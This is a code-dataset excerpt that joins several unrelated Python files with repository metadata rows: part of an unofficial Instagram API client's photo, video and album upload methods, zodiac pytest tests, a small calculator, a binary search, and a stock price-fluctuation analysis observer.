                'android_version': self.android_version,
                'android_release': self.android_release
            },
            'edits': {
                'crop_original_size': [width * 1.0, height * 1.0],
                'crop_center': [0.0, 0.0],
                'crop_zoom': 1.3333334
            },
            'extra': {
                'source_width': width,
                'source_height': height,
            }
        }
        params.update(self.authenticated_params)
        res = self._call_api(endpoint, params=params)
        if self.auto_patch and res.get('media'):
            ClientCompatPatch.media(res.get('media'), drop_incompat_keys=self.drop_incompat_keys)
        return res
    def configure_video_to_reel(self, upload_id, size, duration, thumbnail_data):
        """
        Finalises a video story upload. This should not be called directly.
        Use :meth:`post_video_story` instead.

        :param upload_id: upload session id of the previously uploaded video
        :param size: tuple of (width, height)
        :param duration: in seconds
        :param thumbnail_data: byte string of thumbnail photo
        :return: configure API response dict
        :raises ValueError: when the aspect ratio is not story-compatible
        """
        if not self.reel_compatible_aspect_ratio(size):
            raise ValueError('Incompatible aspect ratio.')

        # NOTE(review): the thumbnail upload's response is discarded -- `res`
        # is reassigned by the configure call below.
        res = self.post_photo(thumbnail_data, size, '', upload_id=upload_id, to_reel=True)

        width, height = size
        params = {
            'source_type': '4',
            'upload_id': upload_id,
            # Timestamps are staggered by small random offsets, presumably to
            # mimic the official app's capture/share/post timing -- confirm.
            'story_media_creation_date': str(int(time.time()) - randint(11, 20)),
            'client_shared_at': str(int(time.time()) - randint(3, 10)),
            'client_timestamp': str(int(time.time())),
            'configure_mode': 1,    # 1 - REEL_SHARE, 2 - DIRECT_STORY_SHARE
            'poster_frame_index': 0,
            'length': duration * 1.0,
            'audio_muted': False,
            'filter_type': '0',
            'video_result': 'deprecated',
            'clips': {
                'length': duration * 1.0,
                'source_type': '4',
                'camera_position': 'back'
            },
            'device': {
                'manufacturer': self.phone_manufacturer,
                'model': self.phone_device,
                'android_version': self.android_version,
                'android_release': self.android_release
            },
            'extra': {
                'source_width': width,
                'source_height': height,
            },
        }
        params.update(self.authenticated_params)
        res = self._call_api('media/configure_to_story/', params=params, query={'video': '1'})
        if self.auto_patch and res.get('media'):
            ClientCompatPatch.media(res.get('media'), drop_incompat_keys=self.drop_incompat_keys)
        return res
def post_photo(self, photo_data, size, caption='', upload_id=None, to_reel=False, **kwargs):
    """
    Upload a photo.

    [CAUTION] FLAKY, IG is very finicky about sizes, etc, needs testing.

    :param photo_data: byte string of the image
    :param caption: caption text for the post
    :param size: tuple of (width, height)
    :param upload_id: if provided, this photo is treated as the thumbnail of a
        video upload already in progress
    :param to_reel: a Story photo
    :param kwargs:
        - **location**: a dict of venue/location information, from :meth:`location_search`
          or :meth:`location_fb_search`
        - **disable_comments**: bool to disable comments
    :return: JSON response from the configure endpoint (or the raw upload
        response for a sidecar video thumbnail)
    """
    warnings.warn('This endpoint has not been fully tested.', UserWarning)
    # if upload_id is provided, it's a thumbnail for a vid upload
    for_video = True if upload_id else False
    if not for_video:
        # Size constraints only apply to stand-alone photos, not video thumbnails.
        if not to_reel and not self.compatible_aspect_ratio(size):
            raise ValueError('Incompatible aspect ratio.')
        if to_reel and not self.reel_compatible_aspect_ratio(size):
            raise ValueError('Incompatible reel aspect ratio.')
        if not 320 <= size[0] <= 1080:
            # range from https://help.instagram.com/1631821640426723
            raise ValueError('Invalid image width.')
    location = kwargs.pop('location', None)
    if location:
        self._validate_location(location)
    disable_comments = True if kwargs.pop('disable_comments', False) else False
    is_sidecar = kwargs.pop('is_sidecar', False)
    if not upload_id:
        upload_id = str(int(time.time() * 1000))
    endpoint = 'upload/photo/'
    fields = [
        ('upload_id', upload_id),
        ('_uuid', self.uuid),
        ('_csrftoken', self.csrftoken),
        ('image_compression', '{"lib_name":"jt","lib_version":"1.3.0","quality":"87"}')
    ]
    if is_sidecar:
        fields.append(('is_sidecar', '1'))
        if for_video:
            fields.append(('media_type', MediaTypes.VIDEO))
    files = [
        ('photo', 'pending_media_{0!s}{1!s}'.format(str(int(time.time() * 1000)), '.jpg'),
         'application/octet-stream', photo_data)
    ]
    content_type, body = MultipartFormDataEncoder().encode(fields, files)
    headers = self.default_headers
    headers['Content-Type'] = content_type
    headers['Content-Length'] = len(body)
    endpoint_url = '{0}{1}'.format(self.api_url.format(version='v1'), endpoint)
    req = compat_urllib_request.Request(endpoint_url, body, headers=headers)
    try:
        self.logger.debug('POST {0!s}'.format(endpoint_url))
        response = self.opener.open(req, timeout=self.timeout)
    except compat_urllib_error.HTTPError as e:
        error_msg = e.reason
        error_response = self._read_response(e)
        self.logger.debug('RESPONSE: {0:d} {1!s}'.format(e.code, error_response))
        try:
            error_obj = json.loads(error_response)
            if error_obj.get('message'):
                error_msg = '{0!s}: {1!s}'.format(e.reason, error_obj['message'])
        except Exception as ex:
            # Bug fix: the inner handler previously rebound ``e``; in Python 3
            # that name is unbound when the inner handler exits, so the
            # ``raise ClientError(..., e.code, ...)`` below raised NameError
            # whenever the error body was not valid JSON. ``ex`` matches the
            # naming used in post_video.
            # do nothing else, prob can't parse json
            self.logger.warn('Error parsing error response: {}'.format(str(ex)))
        raise ClientError(error_msg, e.code, error_response)
    post_response = self._read_response(response)
    self.logger.debug('RESPONSE: {0:d} {1!s}'.format(response.code, post_response))
    json_response = json.loads(post_response)
    if for_video and is_sidecar:
        return json_response
    upload_id = json_response['upload_id']
    # # NOTES: Logging traffic doesn't seem to indicate any additional "configure" after upload
    # # BUT not doing a "configure" causes a video post to fail with a
    # # "Other media configure error: b'yEmZkUpAj4'" error
    # if for_video:
    #     logger.debug('Skip photo configure.')
    #     return json_response
    if to_reel:
        return self.configure_to_reel(upload_id, size)
    else:
        return self.configure(upload_id, size, caption=caption, location=location,
                              disable_comments=disable_comments, is_sidecar=is_sidecar)
def post_video(self, video_data, size, duration, thumbnail_data, caption='', to_reel=False, **kwargs):
    """
    Upload a video.

    [CAUTION] FLAKY, IG is very picky about sizes, etc, needs testing.

    Flow: validate constraints -> request chunked-upload URLs -> upload the
    video in chunks (retrying missing ranges) -> configure the post (with
    retries when the server is still transcoding).

    :param video_data: byte string or a file-like object of the video content
    :param size: tuple of (width, height)
    :param duration: in seconds
    :param thumbnail_data: byte string of the video thumbnail content
    :param caption:
    :param to_reel: post to reel as Story
    :param kwargs:
        - **location**: a dict of venue/location information, from :meth:`location_search`
          or :meth:`location_fb_search`
        - **disable_comments**: bool to disable comments
        - **max_retry_count**: maximum attempts to reupload. Default 10.
    :return: JSON response from the configure step
    :raises ValueError: on size/duration/file-size constraint violations
    :raises ClientError: on upload or configure failure
    """
    warnings.warn('This endpoint has not been fully tested.', UserWarning)
    if not to_reel and not self.compatible_aspect_ratio(size):
        raise ValueError('Incompatible aspect ratio.')
    if to_reel and not self.reel_compatible_aspect_ratio(size):
        raise ValueError('Incompatible reel aspect ratio.')
    if not 612 <= size[0] <= 1080:
        # range was determined through sampling of video uploads
        raise ValueError('Invalid video width.')
    if duration < 3.0:
        raise ValueError('Duration is less than 3s.')
    if not to_reel and duration > 60.0:
        raise ValueError('Duration is more than 60s.')
    if to_reel and duration > 15.0:
        raise ValueError('Duration is more than 15s.')
    max_file_len = 50 * 1024 * 1000
    try:
        # len() works for byte strings; file-like objects raise TypeError and
        # are sized via get_file_size() instead.
        video_file_len = len(video_data)
    except TypeError:
        video_file_len = get_file_size(video_data)
    if video_file_len > max_file_len:
        raise ValueError('Video file is too big.')
    location = kwargs.pop('location', None)
    if location:
        self._validate_location(location)
    disable_comments = True if kwargs.pop('disable_comments', False) else False
    endpoint = 'upload/video/'
    upload_id = str(int(time.time() * 1000))
    width, height = size
    params = {
        '_csrftoken': self.csrftoken,
        '_uuid': self.uuid,
        'upload_id': upload_id,
    }
    is_sidecar = kwargs.pop('is_sidecar', False)
    if is_sidecar:
        params['is_sidecar'] = '1'
    else:
        params.update({
            'media_type': MediaTypes.VIDEO,
            'upload_media_duration_ms': int(duration * 1000),
            'upload_media_width': width,
            'upload_media_height': height
        })
    # First call returns the chunk-upload URL(s) and a job token.
    res = self._call_api(endpoint, params=params, unsigned=True)
    upload_url = res['video_upload_urls'][-1]['url']
    upload_job = res['video_upload_urls'][-1]['job']
    successful_chunk_ranges = []     # (start, end) byte ranges the server acknowledged
    all_done = False
    max_retry_count = kwargs.pop('max_retry_count', 10)
    configure_delay = 0
    for _ in range(max_retry_count + 1):
        # Prevent excessively small chunks
        if video_file_len > 1 * 1024 * 1000:
            # max num of chunks = 4
            chunk_generator = max_chunk_count_generator(4, video_data)
        else:
            # max chunk size = 350,000 so that we'll always have
            # <4 chunks when it's <1mb
            chunk_generator = max_chunk_size_generator(350000, video_data)
        for chunk, data in chunk_generator:
            # Skip any chunk fully covered by an already-acknowledged range.
            skip_chunk = False
            for received_chunk in successful_chunk_ranges:
                if received_chunk[0] <= chunk.start and received_chunk[1] >= (chunk.end - 1):
                    skip_chunk = True
                    break
            if skip_chunk:
                self.logger.debug('Skipped chunk: {0:d} - {1:d}'.format(chunk.start, chunk.end - 1))
                continue
            headers = self.default_headers
            headers['Connection'] = 'keep-alive'
            headers['Content-Type'] = 'application/octet-stream'
            headers['Content-Disposition'] = 'attachment; filename="video.mov"'
            headers['Session-ID'] = upload_id
            if is_sidecar:
                headers['Cookie'] = 'sessionid=' + self.get_cookie_value('sessionid')
            headers['job'] = upload_job
            headers['Content-Length'] = chunk.length
            headers['Content-Range'] = 'bytes {0:d}-{1:d}/{2:d}'.format(chunk.start, chunk.end - 1, video_file_len)
            self.logger.debug('POST {0!s}'.format(upload_url))
            self.logger.debug('Uploading Content-Range: {0!s}'.format(headers['Content-Range']))
            req = compat_urllib_request.Request(
                str(upload_url), data=data, headers=headers)
            try:
                res = self.opener.open(req, timeout=self.timeout)
                post_response = self._read_response(res)
                self.logger.debug('RESPONSE: {0:d} {1!s}'.format(res.code, post_response))
                if res.info().get('Content-Type') == 'application/json':
                    # last chunk: the server replies with JSON once the whole
                    # file has been received.
                    upload_res = json.loads(post_response)
                    configure_delay = int(upload_res.get('configure_delay_ms', 0)) / 1000.0
                    all_done = True
                    break
                else:
                    # Partial progress: the body lists acknowledged byte ranges
                    # as "start-end/total" entries separated by commas.
                    successful_chunk_ranges = []
                    post_progress = post_response.split(',')
                    for progress in post_progress:
                        mobj = re.match(r'(?P<start>[0-9]+)\-(?P<end>[0-9]+)/(?P<total>[0-9]+)', progress)
                        if mobj:
                            successful_chunk_ranges.append((int(mobj.group('start')), int(mobj.group('end'))))
                        else:
                            self.logger.error(
                                'Received unexpected chunk upload response: {0!s}'.format(post_response))
                            raise ClientError(
                                'Upload has failed due to unexpected upload response: {0!s}'.format(post_response),
                                code=500)
            except compat_urllib_error.HTTPError as e:
                error_msg = e.reason
                error_response = self._read_response(e)
                self.logger.debug('RESPONSE: {0:d} {1!s}'.format(e.code, error_response))
                try:
                    error_obj = json.loads(error_response)
                    if error_obj.get('message'):
                        error_msg = '{0!s}: {1!s}'.format(e.reason, error_obj['message'])
                except Exception as ex:
                    # do nothing else, prob can't parse json
                    self.logger.warn('Error parsing error response: {}'.format(str(ex)))
                raise ClientError(error_msg, e.code, error_response)
        else:
            # for-else: the inner loop finished without break, i.e. the upload
            # is still incomplete -> retry with the next outer iteration.
            # if not break due to completed chunks then continue with next chunk
            continue
        break
    if not all_done:
        raise ClientError('Upload has failed due to incomplete chunk uploads.', code=500)
    if not configure_delay:
        configure_delay = 3   # seconds; fallback when the server gave no delay
    configure_retry_max = 2
    for i in range(1, configure_retry_max + 1):
        try:
            if not to_reel:
                result = self.configure_video(
                    upload_id, size, duration, thumbnail_data, caption=caption, location=location,
                    disable_comments=disable_comments, is_sidecar=is_sidecar)
            else:
                result = self.configure_video_to_reel(
                    upload_id, size, duration, thumbnail_data)
            return result
        except ClientError as ce:
            # 202 / "Transcode timeout" means the server is still processing;
            # wait and retry, otherwise propagate.
            if (ce.code == 202 or ce.msg == 'Transcode timeout') and i < configure_retry_max:
                self.logger.warn('Retry configure after {0:f} seconds'.format(configure_delay))
                time.sleep(configure_delay)
            else:
                raise
def post_photo_story(self, photo_data, size):
    """
    Upload a photo story.

    Thin convenience wrapper around :meth:`post_photo` with ``to_reel=True``.

    :param photo_data: byte string of the image
    :param size: tuple of (width, height)
    :return: response from :meth:`post_photo`
    """
    story_kwargs = {
        'photo_data': photo_data,
        'size': size,
        'to_reel': True,
    }
    return self.post_photo(**story_kwargs)
def post_video_story(self, video_data, size, duration, thumbnail_data):
    """
    Upload a video story.

    Thin convenience wrapper around :meth:`post_video` with ``to_reel=True``.

    :param video_data: byte string or a file-like object of the video content
    :param size: tuple of (width, height)
    :param duration: in seconds
    :param thumbnail_data: byte string of the video thumbnail content
    :return: response from :meth:`post_video`
    """
    story_kwargs = {
        'video_data': video_data,
        'size': size,
        'duration': duration,
        'thumbnail_data': thumbnail_data,
        'to_reel': True,
    }
    return self.post_video(**story_kwargs)
def post_album(self, medias, caption='', location=None, **kwargs):
    """
    Post an album of up to 10 photos/videos.

    :param medias: an iterable list/collection of media dict objects

        .. code-block:: javascript

            medias = [
                {"type": "image", "size": (720, 720), "data": "..."},
                {
                    "type": "image", "size": (720, 720),
                    "usertags": [{"user_id":4292127751, "position":[0.625347,0.4384531]}],
                    "data": "..."
                },
                {"type": "video", "size": (720, 720), "duration": 12.4, "thumbnail": "...", "data": "..."}
            ]

    :param caption: caption text for the album
    :param location: a dict of venue/location information, from :meth:`location_search`
        or :meth:`location_fb_search`
    :param kwargs:
        - **disable_comments**: bool to disable comments
    :return: JSON response from the ``media/configure_sidecar/`` endpoint
    :raises ValueError: on invalid/missing media fields or fewer than 2 items
    """
    album_upload_id = str(int(time.time() * 1000))
    children_metadata = []
    for media in medias:
        # Albums are capped at 10 children; extra items are skipped
        # (note: skipped items are not validated either).
        if len(children_metadata) >= 10:
            continue
        if media.get('type', '') not in ['image', 'video']:
            raise ValueError('Invalid media type: {0!s}'.format(media.get('type', '')))
        if not media.get('data'):
            raise ValueError('Data not specified.')
        if not media.get('size'):
            raise ValueError('Size not specified.')
        if media['type'] == 'video':
            if not media.get('duration'):
                raise ValueError('Duration not specified.')
            if not media.get('thumbnail'):
                raise ValueError('Thumbnail not specified.')
        # Album children must be square (1:1). Using != also rejects a NaN
        # aspect ratio, which the old pair of < / > comparisons let through.
        aspect_ratio = (media['size'][0] * 1.0) / (media['size'][1] * 1.0)
        if aspect_ratio != 1.0:
            raise ValueError('Invalid media aspect ratio.')
        if media['type'] == 'video':
            metadata = self.post_video(
                video_data=media['data'],
                size=media['size'],
                duration=media['duration'],
                thumbnail_data=media['thumbnail'],
                is_sidecar=True
            )
        else:
            metadata = self.post_photo(
                photo_data=media['data'],
                size=media['size'],
                is_sidecar=True,
            )
        if media.get('usertags'):
            usertags = media['usertags']
            utags = {'in': [{'user_id': str(u['user_id']), 'position': u['position']} for u in usertags]}
            metadata['usertags'] = json.dumps(utags, separators=(',', ':'))
        children_metadata.append(metadata)
    if len(children_metadata) <= 1:
        raise ValueError('Invalid number of media objects: {0:d}'.format(len(children_metadata)))
    # configure as sidecar
    endpoint = 'media/configure_sidecar/'
    params = {
        'caption': caption,
        'client_sidecar_id': album_upload_id,
        'children_metadata': children_metadata
    }
    if location:
        media_loc = self._validate_location(location)
        params['location'] = json.dumps(media_loc)
        if 'lat' in location and 'lng' in location:
            params['geotag_enabled'] = '1'
            params['exif_latitude'] = '0.0'
            params['exif_longitude'] = '0.0'
            params['posting_latitude'] = str(location['lat'])
            params['posting_longitude'] = str(location['lng'])
            params['media_latitude'] = str(location['lat'])
            # Bug fix: this key was previously 'media_latitude' again, which
            # clobbered the latitude with the longitude value and never sent
            # 'media_longitude' at all.
            params['media_longitude'] = str(location['lng'])
    disable_comments = kwargs.pop('disable_comments', False)
    if disable_comments:
        params['disable_comments'] = '1'
    params.update(self.authenticated_params)
    res = self._call_api(endpoint, params=params)
    if self.auto_patch and res.get('media'):
        ClientCompatPatch.media(res.get('media'), drop_incompat_keys=self.drop_incompat_keys)
    return res
| [
"com.tong@dingtone.me"
] | com.tong@dingtone.me |
cffecf521887b256704c2687151498010ff2288d | d1c9ff2dcc126d29f29ac0d47d48900b8413137e | /bite_242/test_zodiac.py | d779f465679abf977a6adcb16419e5249b747456 | [] | no_license | Accoustium/PyBites | d8aa2f7405ad33a0432340209b4a98e229058d16 | 4f57cc0243d4888edb3355c9517f53569ac37632 | refs/heads/master | 2020-09-20T09:31:45.088079 | 2020-07-17T20:59:28 | 2020-07-17T20:59:28 | 224,437,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,682 | py | from datetime import datetime
import json
import os
from pathlib import Path
from urllib.request import urlretrieve
import pytest
from zodiac import (get_signs, get_sign_with_most_famous_people,
signs_are_mutually_compatible, get_sign_by_date)
# original source: https://zodiacal.herokuapp.com/api
URL = "https://bites-data.s3.us-east-2.amazonaws.com/zodiac.json"
TMP = os.getenv("TMP", "/tmp")  # scratch directory; falls back to /tmp when $TMP is unset
PATH = Path(TMP, "zodiac.json")  # local cache path for the downloaded fixture data
@pytest.fixture(scope='module')
def signs():
    """Download the zodiac JSON once per module (cached on disk) and parse it
    into the list of Sign objects produced by get_signs()."""
    if not PATH.exists():
        urlretrieve(URL, PATH)
    with open(PATH, encoding='utf-8') as f:
        # json.load reads directly from the file object; no need to slurp the
        # whole file into a string first with f.read() + json.loads.
        data = json.load(f)
    return get_signs(data)
def test_twelve_sings(signs):
    """The parsed data contains exactly the twelve zodiac signs."""
    expected_sign_count = 12
    assert len(signs) == expected_sign_count
def test_get_list_of_signs(signs):
    """Elements returned by get_signs() are zodiac.Sign instances."""
    first = signs[0]
    # Build the fully qualified class name directly instead of parsing the
    # repr of type() with str.split, which is fragile.
    fqname = f"{type(first).__module__}.{type(first).__qualname__}"
    assert fqname == 'zodiac.Sign'
def test_famous_signs(signs):
    """Scorpio tops the famous-people count with 35 entries."""
    most_famous = get_sign_with_most_famous_people(signs)
    assert most_famous == ('Scorpio', 35)
def test_sign_compatibility(signs):
    """Spot-check mutual (in)compatibility for a few known pairings."""
    checks = [
        ('Aries', 'Leo', True),
        ('Aries', 'Pisces', False),
        ('Pisces', 'Taurus', True),
    ]
    for first, second, expected in checks:
        assert bool(signs_are_mutually_compatible(signs, first, second)) == expected
def test_months(signs):
    """Interior and boundary dates map to the expected signs."""
    cases = (
        ('2020-05-05', 'Taurus'),
        ('2020-03-09', 'Pisces'),
        ('2020-03-21', 'Aries'),   # first day of Aries
        ('2020-04-19', 'Aries'),   # last day of Aries
    )
    for iso_date, expected_sign in cases:
        when = datetime.fromisoformat(iso_date)
        assert get_sign_by_date(signs, when) == expected_sign
| [
"tim.pogue@cybera.net"
] | tim.pogue@cybera.net |
874a69d989a964f5f0210a7eafbf994cd3c38d0c | 6ddcdda679089b228d55ef098addfe8193287d88 | /py/lpthw/test.py | 500c610d2d9010ee315cb403153222d93a1680c9 | [
"MIT"
] | permissive | danyfang/SourceCode | 518e4715a062ed1ad071dea023ff4785ce03b068 | 8168f6058648f2a330a7354daf3a73a4d8a4e730 | refs/heads/master | 2021-06-06T16:36:50.999324 | 2021-04-23T08:52:20 | 2021-04-23T08:52:20 | 120,310,634 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 547 | py | #!/usr/bin/python
from __future__ import division  # Python 2: make / perform true (float) division
# Compute x! by folding multiplication over 1..x with a lambda.
# (Python 2 code: raw_input, print statement and builtin reduce.)
x = int(raw_input("Please input an integer\n > "))
print reduce(lambda x,y: x*y, range(1,x+1))
def add(x, y):
    """Return the sum of x and y."""
    total = x + y
    return total
def sub(x, y):
    """Return x minus y."""
    difference = x - y
    return difference
def mul(x, y):
    """Return the product of x and y."""
    product = x * y
    return product
def div(x, y):
    """Return x divided by y (true division, per the __future__ import)."""
    quotient = x / y
    return quotient
# Dispatch table mapping an operator symbol to its implementation.
# NOTE(review): the name shadows the stdlib `operator` module's name.
operator = {"+":add, "-":sub, "*":mul, "/":div}
if __name__ == "__main__":
    # Python 2 interactive calculator: read two numbers and a symbol,
    # dispatch through the table above and print the result.
    x = raw_input("Please input a numebr\n > ")
    o = raw_input("Please input an operator\n > ")
    y = raw_input("Please input a numebr\n > ")
    # dict.get returns None for an unknown symbol, so calling the result
    # would raise TypeError on bad operator input.
    print operator.get(o)(int(x), int(y))
| [
"danyfang7@gmail.com"
] | danyfang7@gmail.com |
184e76acc81ef96d91ecfc5efccadfcb8455eaea | 7f00f425e3ffe87716a010c7c2a13af8b8ebd790 | /search/binary_search_iterative.py | 6a6cc3550aff63c7843fcd16c65ccd314ed3ea43 | [] | no_license | barmansurajit/trees | 7601bdc3229356949551127184e95f6a23b0c30a | 75f03d44a7197ba0334104216925ade8b2c73c6d | refs/heads/master | 2023-03-07T06:33:29.610186 | 2021-02-17T02:34:21 | 2021-02-17T02:34:21 | 339,591,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 490 | py | def binary_search(arr, data):
n = len(arr)
l: int = 0
r = n - 1
while l <= r:
mid = int(l + (r - l) / 2)
if data == arr[mid]:
return mid
elif data > arr[mid]:
l = mid + 1
else:
r = mid - 1
return -1
array = [5, 9, 17, 23, 25, 45, 59, 63, 71, 89]
x = 8
location = binary_search(array, x)
if location != -1:
print(f"Element is present at index {location}")
else:
print(f"Element not found")
| [
"Surajit.Barman@cognizant.com"
] | Surajit.Barman@cognizant.com |
df505e9af0f2f820295ab64a09f370c98512ade5 | 20e8c4fe06e05873e212cfb31942208a10b7d502 | /source/observers/observer_pricefluctuation_multistock_dailyclose.py | 440a0b67831abc1a53305e0b68ef51f7d093021f | [] | no_license | abednego1979/tipster2 | adafd85e65904c957c8bf248790b4f781c0737b0 | 556d36e409be117230585fffa9a6ee40008ccd47 | refs/heads/master | 2019-07-11T22:39:34.699695 | 2018-07-10T10:17:29 | 2018-07-10T10:17:29 | 110,588,227 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,941 | py | #*- coding: utf-8 -*-
#Python 3.5.x
#utf8编码
import os
import sys
import logging
import json
import traceback
from .observer import Observer
import myGlobal
import config
import numpy as np
import pandas as pd
from concurrent.futures import ThreadPoolExecutor, wait
from BaseFunc import BaseFunc
from database.DB_Ex import MyDbEx
from info_output.Drawing import MyDrawing
# This Observer uses price fluctuation to find price lows.
# For a group of stocks, one of them serves as the reference; each stock's
# relative fluctuation is computed, and the stocks currently at a relative
# low are identified automatically.
#
class PriceFluctuation_MultiStock_DailyClose_Actor(MyDbEx, BaseFunc):
    """For one group of related stocks, compute each stock's daily-close ratio
    against a reference stock (the first in the list) and that ratio's
    deviation from its rolling mean, to identify which stock currently sits
    at a relative low."""
    def __init__(self, stocks, meanLen, StockClass=''):  # meanLen: length (days) of the reference moving average
        self.stocks=stocks  # list of stock codes; stocks[0] is the reference stock
        self.StockClass=StockClass  # category label of this stock group
        self.meanLen=meanLen  # rolling-mean window used as the reference line
        self.LoggerPrefixString='<%s><%s><mean:%d>' % (self.StockClass, json.dumps(self.stocks), self.meanLen)
        self.result=[]  # filled by newTicker(): [[stock, latest fluctuation], ...] sorted ascending
        pass
    def selfLogger(self, level, OutString):
        """Log OutString at the given level ('info'/'debug'/'error'),
        prefixed with this actor's identification string. Never raises:
        any failure is printed and swallowed."""
        try:
            if level=='info':
                myGlobal.logger.info(self.LoggerPrefixString+OutString)
            elif level=='debug':
                myGlobal.logger.debug(self.LoggerPrefixString+OutString)
            elif level=='error':
                myGlobal.logger.error(self.LoggerPrefixString+OutString)
        except Exception as err:
            # NOTE(review): the concatenation above raises TypeError when
            # OutString is not a str (e.g. an Exception object); the message
            # is then lost and only printed here.
            print (err)
            print(traceback.format_exc())
    def newTicker(self):
        """Recompute ratios/means/fluctuations for self.stocks, write them to
        a CSV under config.tempOutDataDir and store the latest per-stock
        fluctuation values (ascending) in self.result.

        Steps:
          1. fetch each stock's adjusted close prices
          2. compute each stock's close ratio against the first stock
          3. assert there are no invalid (NaN) values
          4. compute the meanLen-day rolling mean of each ratio
          5. compute each ratio's deviation from its rolling mean
        """
        # Run the computation for the stocks listed in self.stocks.
        myGlobal.logger.info("newTicker for multistock policy:%s,meanLen:%d" % (json.dumps(self.stocks), self.meanLen))
        # Fetch each stock's closing prices.
        Close=None
        for stock in self.stocks:
            res=self.DbEx_GetDataByTitle(stock, ['Date', 'AdjClose'], outDataFormat=np.float32)
            # Convert to a pandas DataFrame.
            #tempData=pd.DataFrame(res[:,1], index=res[:,0].tolist(), columns=[stock])
            tempData=pd.DataFrame(res, columns=['Date', stock])
            try:
                # Truth-testing a DataFrame raises ValueError, so this branch
                # only assigns on the first iteration (while Close is None);
                # later iterations fall through to the merge below.
                if not Close:
                    Close=tempData
            except:
                # Merge on 'Date'; with no explicit "how" pandas does an inner
                # join, keeping only dates present in both frames (this also
                # drops each stock's suspension days).
                Close=pd.merge(Close, tempData, on='Date')
        Close = Close.sort_values(by=['Date'])
        refStock=self.stocks[0]
        # Compute each stock's close-price ratio against the first stock.
        # Iterating in reverse normalises the reference column last, so the
        # other columns divide by its original (unscaled) values.
        CloseRate=Close.copy(deep=True)
        for stock in reversed(self.stocks):
            CloseRate[stock]=CloseRate[stock]/CloseRate[refStock]
        # The inner merge above already removed suspension days, so no
        # invalid values should remain here.
        assert not CloseRate.isnull().values.any()
        # meanLen-day rolling mean of the ratios (the "mean ratio").
        rateMeans=CloseRate.copy(deep=True)
        for stock in self.stocks:
            rateMeans[stock]=rateMeans[stock].rolling(window=self.meanLen,center=False).mean()
        rateMeans.fillna(value=1.0, inplace=True)
        # Fluctuation of each ratio relative to its rolling mean.
        rateFluctuation=rateMeans.copy(deep=True)
        for stock in self.stocks:
            rateFluctuation[stock]=CloseRate[stock]-rateMeans[stock]
        # Add a human-readable date column.
        Close['DateString']=list(map(lambda x: BaseFunc().num2datestr(x), Close['Date']))
        # Persist Close, CloseRate, rateMeans and rateFluctuation to one CSV.
        saveData=pd.merge(Close, CloseRate.rename(index=str, columns=dict(zip(self.stocks,map(lambda x:"CloseRate_"+x, self.stocks)))), on='Date')
        saveData=pd.merge(saveData, rateMeans.rename(index=str, columns=dict(zip(self.stocks,map(lambda x:"rateMeans_"+x, self.stocks)))), on='Date')
        saveData=pd.merge(saveData, rateFluctuation.rename(index=str, columns=dict(zip(self.stocks,map(lambda x:"rateFluctuation_"+x, self.stocks)))), on='Date')
        saveData.to_csv(os.path.join(config.tempOutDataDir, self.StockClass+'_pricerate_fluctuation_multistock_'+str(self.meanLen)+'.csv'))
        # All required data has been computed and saved. Summarise the latest
        # fluctuation of each stock for downstream processing (most negative,
        # i.e. most undervalued relative to its mean ratio, comes first).
        self.result=[]
        for stock in self.stocks:
            self.result.append([stock, rateFluctuation[stock].tolist()[-1]])
        self.result.sort(key=lambda x:x[1], reverse=False)
        return
class observer_PriceFluctuation_MultiStock_DailyClose(Observer):
    """Observer driving one PriceFluctuation_MultiStock_DailyClose_Actor per
    (stock group, mean-line length) combination; reports the best candidate
    per combination and plots the leading stocks' fluctuation curves."""
    def __init__(self):
        # Build one actor per (stock group, mean length) combination.
        self.actors=[]
        self.meanLenArray=[5,8,10,12,20]  # days
        #thresholdArray=[0.005,0.010,0.015,0.020]
        for stockType in config.stockList.keys():
            # One group of stocks per stock type.
            stockListTemp=[item[0] for item in config.stockList[stockType]]
            paraArray=[(stockListTemp, meanLen) for meanLen in self.meanLenArray]
            self.actors+=[PriceFluctuation_MultiStock_DailyClose_Actor(item[0], item[1], stockType) for item in paraArray]
        self.threadpool = ThreadPoolExecutor(max_workers=8)
        super(observer_PriceFluctuation_MultiStock_DailyClose, self).__init__()
    def end_opportunity_finder(self):
        """Report each actor's best pick (log + MailOutInfo.txt + mail
        attachments) and plot fluctuation curves for the shortest mean."""
        for actor in self.actors:
            # Each actor covers (one group of same-class stocks, one mean length).
            try:
                actor.selfLogger ('info', "<end><meanlen:%d><stockClass:%s>" % (actor.meanLen, actor.StockClass))
                infoString="Best policy for MultiStocks (StockClass=%s) (meanLen=%d) is buy stock %s.(%s)" % (actor.StockClass, actor.meanLen, actor.result[0][0], json.dumps(actor.result))
                myGlobal.logger.info(infoString)
                try:
                    # Best-effort append to the mail body file; failures ignored.
                    with open('MailOutInfo.txt', 'a') as pf:
                        pf.write(infoString+'\r\n')
                except:
                    pass
                objfilename=os.path.join(config.tempOutDataDir, actor.StockClass+'_pricerate_fluctuation_multistock_'+str(actor.meanLen)+'.csv')
                myGlobal.attachMailFileList.append(objfilename)
            except Exception as err:
                print (err)
                print(traceback.format_exc())
                #actor.selfLogger ('error', err)
        # Plot the results (only for the shortest mean length).
        for actor in self.actors:
            try:
                if actor.meanLen != self.meanLenArray[0]:
                    continue
                # Candidates exclude the reference stock (first entry of the group).
                bestThreeStock=[item for item in actor.result if item[0]!=config.stockList[actor.StockClass][0][0]]
                # Read the <StockClass>_pricerate_fluctuation_multistock_<meanLen>.csv
                # file written by the actor. (The doubled assignment below is a
                # harmless no-op left from the original code.)
                objfilename=objfilename=os.path.join(config.tempOutDataDir, actor.StockClass+'_pricerate_fluctuation_multistock_'+str(actor.meanLen)+'.csv')
                df = pd.read_csv(objfilename, encoding='gbk')
                # Plot the rateFluctuation curves of the (up to) three best
                # stocks over the last xLen trading days.
                drawLineNum=min(len(bestThreeStock),3)
                drawData=df[['rateFluctuation_'+bestThreeStock[i][0] for i in range(drawLineNum)]].copy(deep=True)
                xLen=30
                x=np.array(range(xLen))
                yList=[np.array(drawData['rateFluctuation_'+bestThreeStock[i][0]])[-xLen:] for i in range(drawLineNum)]
                jpgFilename=objfilename.replace('.csv', '.jpg')
                MyDrawing().drawCurve(x, yList, lineName=[bestThreeStock[i][0] for i in range(drawLineNum)], outfile=jpgFilename, title=actor.StockClass+'_'+str(actor.meanLen), xlabel='Date', ylabel='Values')
                myGlobal.attachMailFileList.append(jpgFilename)
            except Exception as err:
                print (err)
                print(traceback.format_exc())
                pass
